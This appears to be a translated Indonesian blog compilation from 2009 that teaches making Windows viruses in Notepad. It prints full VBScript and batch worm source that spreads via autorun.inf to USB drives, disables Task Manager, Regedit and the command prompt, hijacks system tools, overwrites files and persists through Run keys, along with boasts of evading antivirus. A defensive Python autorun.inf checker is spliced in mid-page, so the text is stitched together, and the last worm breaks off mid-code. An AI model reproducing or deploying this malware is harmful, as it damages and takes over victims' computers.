Ways to make a virus with Notepad
1. Putting a virus on a flash disk
11 December 2009
Author: verdhy • Article category: Cracking, Virus
While idly plugging in my relative's flash disk, I came across a piece of local malcode written in VBS. So virus makers have started turning to VBS. Perhaps this has to do with intellectual property rights (HAKI, Hak Atas Kekayaan Intelektual), since most copies of VB6.0 in circulation are pirated. So the author wrote the virus in VBS, which can be written with nothing but Notepad because Windows already ships with a compiler integrated with it, Windows Based Script Host.
As promised, we will make a simple virus using Notepad. This virus spreads itself to removable disks with AutoRun, so that any other computer the infected flash disk is plugged into immediately becomes a victim, without waiting for the user to run the infector. I have named this virus “Kalong.VBS”. Now open Notepad. Copy the following code:
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next
‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi Registry–//
set kalong = createobject(”WScript.Shell”)
‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode
Save the code in Notepad via FILE > SAVE. Then under Save as type choose “All Files (*.*)”. Save it with the name: verdhy.dll.vbs. Strictly speaking the *.dll part is not needed; it is only there so the file looks less suspicious.
But this one is better because it is not detected by PCMAV RC15, CLAMAV, and AVAST. Take this as showing you that making a virus/worm does not require buying pirated software. Notepad (from an original Windows) will do.
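From the defender's side, the autorun.inf that this script drops on every removable drive is a strong indicator on its own. The following is an added example, not part of the original article: a Python triage function (the names `parse_autorun` and `triage_autorun` and the finding labels are assumptions of this example) that flags an autorun.inf whose launch entry calls a script host, targets a script file, or uses a decoy double extension. The sample inputs are constructed from the autorun text shown on this page.

```python
import re

# Interpreters that should never be the launch target of a removable drive.
SCRIPT_HOSTS = {"wscript.exe", "wscript", "cscript.exe", "cscript", "cmd.exe", "cmd"}
# Extensions that run through Windows Script Host or the command shell.
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd")
# A decoy extension followed by a script extension, e.g. "name.dll.vbs".
DOUBLE_EXT = re.compile(
    r"\.(dll|exe|doc|txt|jpg|pdf)\.(vbs|vbe|js|jse|wsf|bat|cmd)$", re.I
)
# autorun.inf keys that name something to execute.
EXEC_KEYS = ("open", "shellexecute")


def parse_autorun(text):
    """Return {key: value} for the [autorun] section, keys lower-cased."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def triage_autorun(text):
    """Return a sorted list of finding labels for one autorun.inf body."""
    findings = set()
    for key, value in parse_autorun(text).items():
        # shell\<verb>\command entries execute too, not only open/shellexecute.
        is_exec = key in EXEC_KEYS or (
            key.startswith("shell\\") and key.endswith("\\command")
        )
        if not is_exec:
            continue
        tokens = value.replace('"', " ").split()
        if not tokens:
            continue
        program = tokens[0].rsplit("\\", 1)[-1].lower()
        if program in SCRIPT_HOSTS:
            findings.add("script-host")
        for tok in tokens:
            low = tok.lower()
            if low.endswith(SCRIPT_EXTS):
                findings.add("script-target")
            if DOUBLE_EXT.search(low):
                findings.add("double-extension")
    return sorted(findings)


# Constructed samples: the first two reuse autorun text quoted on this page,
# the third is a constructed benign installer disc.
KALONG_AUTORUN = "[autorun]\r\nshellexecute=wscript.exe k4l0n6.dll.vbs\r\n"
BATCH_AUTORUN = "[autorun]\nopen=verdhy.bat\n"
BENIGN_AUTORUN = "[autorun]\nopen=setup.exe\nicon=setup.exe,0\nlabel=Driver CD\n"

if __name__ == "__main__":
    for name, body in [("kalong", KALONG_AUTORUN),
                       ("batch", BATCH_AUTORUN),
                       ("benign", BENIGN_AUTORUN)]:
        print(name, triage_autorun(body))
```

Windows 7 and later ignore AutoRun entries on USB flash drives by default; on older hosts the NoDriveTypeAutoRun policy closes the same path.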
=====================================================================
2. This virus must be saved with the name ‘’verdhy.exe.vbs’’ (without the quotes)
WARNING…!!!!
this virus is very dangerous…
whatever happens is not my responsibility…
Click Start, open Run, then click Notepad, or you can also just open Notepad directly
Then copy and paste the script in this table
‘El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,”"
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
do while year(now) >= 2008
WScript.sleep 20000
msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
“ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
“dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
“iko permainan yang paten ma dunsanak” & vbcrlf & _
vbcrlf & vbcrlf & _
” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
” aaa kini saaiknyo ma dunsanak”
loop
Don't forget to save it by clicking FILE-SAVE and typing the name ‘’verdhy.exe.vbs’’
================================================================
3. The effect of this virus is not too dangerous …
The effect of this virus is only to change the appearance of Windows …
But it is enough to give someone a shock …!!!
But the important thing is that it is not detected by antivirus (as far as I know)
This only works on WINDOWS XP
How:
- open Notepad and write (copy and paste … but edit it first … ) the script in this table
@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
- then SAVE AS ALL FILES with the extension .bat (verdhy.bat)
- create Autorun.inf with the script:
[autorun]
open=verdhy.bat
- then SAVE AS ALL FILES with the extension .inf (Autorun.inf)
- the files must be in one directory; then select the files, right-click PROPERTIES and tick HIDDEN and READ-ONLY
- copy the files to a CD
- enjoy the effect
Notes:
1. This is for learning only
2. We are not responsible for misuse of the article above
3. Have fun
note:
- do not misuse this …
- sorry if this has been posted before
- sorry again if this is the wrong place to post … I am a new member and still an amateur …
- sorry once more if anything is wrong, and please correct it …
- if you want to make the antivirus for it, just modify the values …
Source: http://www.yogyafree.net/forum2/viewtopic.php?t=11281
4. A virus is something most people certainly dislike, so when your computer catches one it is really annoying, right???
So there is no harm in making a small virus ourselves, because small things can become big. It also adds to our knowledge of the ins and outs of “the Destroyer”, a.k.a. viruses …
because learning is fun, especially when done for kicks. [hheeheee]
OK, let's get straight to it …
1. Open Notepad [any way you like, e.g. Run >> type Notepad >> done, right???
Copy the script below . . .
Rem sidoarjocity4154802560
On Error Resume Next
Dim Reg, fso, Induk
Set Reg = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
Set Induk = fso.GetFile(Wscript.ScriptFullName)
If Induk <> Reg.SpecialFolders("AppData") & "\blukutuk.vbs" then
If fso.fileExists(Left(Induk, Len(Induk) - 4)) Then
Reg.Run (Reg.RegRead("HKCR\" & BacaHandle("doc") & "\shell\Open\command\") & " " & chr(34) & Left(Induk, len(Induk)-3) & chr(34))
Else
Reg.Run (Reg.RegRead("HKCR\" & BacaHandle("doc") & "\shell\Open\command\") & " " & chr(34) & chr(34))
End If
End If
AutoFlash
Sebar1
Sebar2
Samar
Pertahanan
ShortCut
SerangFile (Left(Induk, InStrRev(Induk, " \ ")))
SerangFolder (Left(Induk, InStrRev(Induk, " \ ")))
SerangDrive("c:\")
SerangDrive("d:\")
SerangDrive("e:\")
SerangDrive("f:\")
SerangDrive("g:\")
AlwaysRun
SerangRecent
Sub AutoFlash
On Error Resume Next
Dim flashdrive, auto, tf1, tf2
For Each flashdrive In fso.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
Set auto = fso.CreateTextFile(flashdrive.Path & ("\AutoRun.inf"), True)
auto.Write ("[autorun]"& vbcrlf & "shellexecute=wscript.exe sidoarjo hot.vbs")
auto.Close
set tf1=fso.getfile(flashdrive.path & "\AutoRun.inf")
tf1.Attributes = 32
Induk.Copy (flashdrive.Path & "\sidoarjo hot.vbs")
set tf2=fso.getfile(flashdrive.path & "\sidoarjo hot.vbs")
tf2.Attributes = 32
End If
Next
End Sub
Sub SerangDrive (Lokasi)
On Error Resume Next
Dim drv
If fso.DriveExists(Lokasi) Then
Set drv = fso.GetDrive(fso.GetDriveName(Lokasi))
If drv.DriveType = 1 Or drv.DriveType = 2 Then
CopyVbs (Lokasi & "\lapindo.vbs")
SerangFolder (Lokasi)
End If
End If
End Sub
Sub SerangFolder (Lokasi)
On Error Resume Next
If Lokasi = "" Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders("Desktop"),3) & "Windows" then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & "\bacalah aku.vbs")
SerangFile (target)
SerangFolder2 (target)
Next
End Sub
Sub SerangFolder2 (Lokasi)
On Error Resume Next
If Lokasi = "" Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders("Desktop"),3) & "Windows" then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & "\duit.vbs")
SerangFile (target)
SerangFolder3 (target)
Next
End Sub
Sub SerangFolder3 (Lokasi)
On Error Resume Next
If Lokasi = "" Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders("Desktop"),3) & "Windows" then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & "\Hasil rapat.vbs")
SerangFile (target)
Next
End Sub
Sub SerangFile (Lokasi)
On Error Resume Next
Dim target
For Each target In fso.GetFolder(Lokasi).Files
If lcase(Right(target,3))="doc" then
if Left(target,2)<> "~$" then CopyVbs(target & ".vbs")
HilangFile (target)
End If
If lcase(Right(target,3))="xls" or lcase(Right(target,3))="ppt" or lcase(Right(target,3))="pdf" or lcase(Right(target,3))="rtf" or lcase(Right(target,3))="rar" or lcase(Right(target,3))="zip" or lcase(Right(target,3))="jpg" or lcase(Right(target,3))="gif" or lcase(Right(target,3))="bmp" then
if Left(target,2)<> "~$" then CopyVbs(Left(target, len(target)-3) & "vbs")
End If
If lcase(Right(target,4))="docx" or lcase(Right(target,4))="xlsx" or lcase(Right(target,4))="pptx" then
if Left(target,2)<> "~$" then CopyVbs(Left(target, len(target)-4) & "vbs")
End If
if lcase(Right(target,3))="vbs" then KillVBS(target)
Next
End sub
Sub Pertahanan
On Error Resume Next
Reg.RegWrite "HKCR\inffile\shell\Install\command\", "logoff.exe"
Reg.RegWrite "HKCR\regfile\shell\open\command\", "logoff.exe"
Reg.RegWrite "HKCR\VBSFile\Shell\Edit\Command\", "logoff.exe"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "0", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
Reg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableTaskMgr", "1", "REG_DWORD"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskMgr.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","Notepad.exe"
End Sub
Sub Samar
On Error Resume Next
Dim HandleDoc, HandleVbs
HandleDoc = "HKEY_CLASSES_ROOT\" & BacaHandle("doc")
HandleVbs = "HKEY_CLASSES_ROOT\" & BacaHandle("VBS")
Reg.RegWrite HandleVbs & "\", Reg.RegRead(HandleDoc & "\")
Reg.RegWrite HandleVbs & "\DefaultIcon\", Reg.RegRead(HandleDoc & "\DefaultIcon\")
Reg.RegWrite HandleVbs & "\NeverShowExt",""
Reg.RegWrite "HKCR\VBSFile\FriendlyTypeName", Reg.RegRead(HandleDoc & "\")
End Sub
Sub ShortCut
On Error Resume Next
Dim lnk, lok
lok = Reg.SpecialFolders("Favorites") & "\blukutuk.lnk"
Set lnk = Reg.CreateShortCut(lok)
Induk.Copy (Reg.SpecialFolders("AppData") & "\blukutuk.vbs")
lnk.TargetPath = Reg.ExpandEnvironmentStrings(Reg.SpecialFolders("AppData") & "\blukutuk.vbs")
lnk.Save
HilangFile (lok)
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\blukutuk", lok
End Sub
Sub HilangFile (AlamatFile)
Dim f1
Set f1 = fso.GetFile(AlamatFile)
f1.Attributes = 6
End sub
Sub CopyVbs (Alamat)
On Error Resume Next
Dim data, ts, s, a, tf
Randomize
data = Left(Rnd(15) * 10000000000, 10)
Set ts = fso.openTextFile(Induk, 1)
a = ts.ReadAll
s = Right(a, Len(a) -28)
ts.Close
Set tf = fso.CreateTextFile(Alamat, True)
tf.WriteLine ("Rem sidoarjocity" & data)
tf.Write s
tf.Close
Set ts = fso.GetFile(Alamat)
ts.Attributes = 1
End sub
Function BacaHandle(TipeFile)
BacaHandle = reg.RegRead ("HKEY_CLASSES_ROOT\." & TipeFile & "\")
End Function
Sub KillVBS(alamat)
On Error Resume Next
Dim ts, s, i, a, b
Set ts = fso.openTextFile(alamat, 1)
s = ts.Readline
ts.Close
a = instr(s, "sidoarjocity")
If a = 0 Or a = "" Then
Set ts = fso.GetFile(alamat)
ts.Attributes = 0
Set ts = fso.openTextFile(Induk, 1)
i = ts.ReadAll
ts.Close
Set ts = fso.CreateTextfile(alamat, True)
ts.Write i
ts.Close
End If
End sub
sub AlwaysRun
On Error Resume Next
Dim mf, check
If Wscript.ScriptFullname = Reg.SpecialFolders("AppData") & "\blukutuk.vbs" then
Do
Set mf = fso.getfile(Wscript.ScriptFullname)
check = mf.Drive.drivetype
If check <> 1 Then Wscript.sleep 200000
Reg.run fso.getspecialfolder(0) & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
AutoFlash
Sebar1
SerangDrive("d:\")
SerangDrive("e:\")
Loop While check <> 1
End If
End sub
Sub Sebar1
dim nilai
nilai=Left(Reg.SpecialFolders("Desktop"),3) & "Windows\System.vbs"
CopyVBS (nilai)
HilangFile(nilai)
SerangFolder(Reg.SpecialFolders("MyDocuments"))
CopyVbs(Reg.SpecialFolders("NetHood") & "\Ceritaku.txt.vbs")
End Sub
Sub SerangRecent
On Error Resume Next
Dim target, ok
For Each target in fso.GetFolder(Reg.SpecialFolders("Recent")).Files
Set ok = reg.CreateShortCut(target)
if fso.FolderExists(ok.WorkingDirectory) then SerangFolder (ok.WorkingDirectory)
Next
End sub
Rem Created by Vir.VBS Generator V.1
2. Once it is copied, just paste it into Notepad, so there is no need to type it all out . .
3. Then save it [File>>Save As] and name it “Lapindo.vbs” [remember to include the quotation marks, don't forget]
4. The virus is done; if you click it [better not, it is rather dangerous]
Notes:
If you use Avira antivirus [the one with the red umbrella], it is detected immediately under the name VBS/Autorun.T . . .
And if you do click it, then true to its name “Lapindo”, a computer running the AVG, Avira or Norton antivirus will be drowned, i.e. they stop working…
And there are many other effects
So be careful
That is enough explanation about making a virus with Notepad, and remember the rules of the game: For Education Only. . . If anyone is interested, next time I will make a nastier one, hehheheeh
1. Disabling the registry
1. Open Notepad, then write the script below:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\poli cies\system /v
disableregistrytools /t reg_dword /d ""1"" /f", vbhide
There are actually many ways to disable regedit, for example like this:
CreateObject("WScript.Shell").regwriteHKEY_CURRENT _USER\software\microsoft\windows\currentversion\po licies\systemdisableregistrytools", 1, "REG_DWORD"
2. Save it with any name you like, ending in .vbs
2. Making a virus that can copy itself to another directory
Open Notepad, then write the script below:
CreateObject("Scripting.FileSystemObject").
GetFile(WScript.ScriptFullName).Copy "c:\windows\system32\virus.vbs"
There is also another way, with code like this:
On Error Resume Next
createobject("scripting.filesystemobject").copyfil e wscript.scriptfullname,
createobject("scripting.filesystemobject")
.getspecialfolder(1) & "\virus.vbs"
for example, to copy itself to the directory C:\WINDOWS\System32
with the name virus.vbs
.getspecialfolder(0) is used for the WINDOWS directory
.getspecialfolder(1) is used for the SYSTEM32 directory on Windows XP
.getspecialfolder(2) is used for the Temporary directory
2. Save it with any name you like, ending in .vbs
3. Making a process-killer virus
Open Notepad, then write the script below:
for example, we will kill the task manager process
On Error Resume Next
CreateObject("WScript.Shell")
.run "taskkill /f /im taskmgr.exe", vbhide
2. Save it with the .vbs extension
4. Running the virus at startup, or when Windows is switched on
On Error Resume Next
CreateObject("WScript.Shell").RegWrite "HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\Curr entVersion\Run\virus"
, "c:\windows\system32\virus.vbs"
(runs the virus located in the directory c:\windows\system32
with the name virus.vbs)
2. Save it with the .reg extension (the same way as for vbs)
5. Making a virus that can delete files/folders
Open Notepad, then write the script below; so that the virus we make does not need much script, it can be shortened like this:
On Error Resume Next
set hapus = CreateObject("Scripting.FileSystemObject")
hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\)
Example:
On Error resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe”
hapus.DeleteFolder “C:\antivirus”
Save the script as a .vbs file, e.g. virusdeleted.vbs
6. Making a virus that can restart Windows
Open Notepad, then write the script below:
CreateObject("WScript.Shell").run "shutdown -r -f -t 60", vbhide
restarts Windows after 60 seconds
Save the script as a .vbs file, e.g. virusrestart.vbs
7. Making a virus that can shut down and restart Windows
Open Notepad, then write the script below:
CreateObject("WScript.Shell").run "shutdown -s -f -t 60", vbhide
Shuts Windows down after 60 seconds
“shutdown -s -f -t 60"
S = for shutdown and
R = for reboot\restart
Save the script as a .vbs file, e.g. virusshutdown.vbs
*if the virus does not run, check the spaces and quotation marks again*
VIRUS NOTEPAD ERCAN-X
The method is the same as before: copy and paste the text below
on error resume next
dim rekur,windowpath,desades,fs,mf,isi,tf,ercan,nt,check,sd
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe 3rc4nms32.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs ")
tf.attributes = 32
set tf = fs.createtextfile(windowpath & "\3rc4n-x.dll.vbs",2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs")
tf.attributes = 39
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(desades.path &"\3rc4nms32.dll.vbs",2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes = 39
set tf =fs.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next
set ercan = createobject("WScript.Shell")
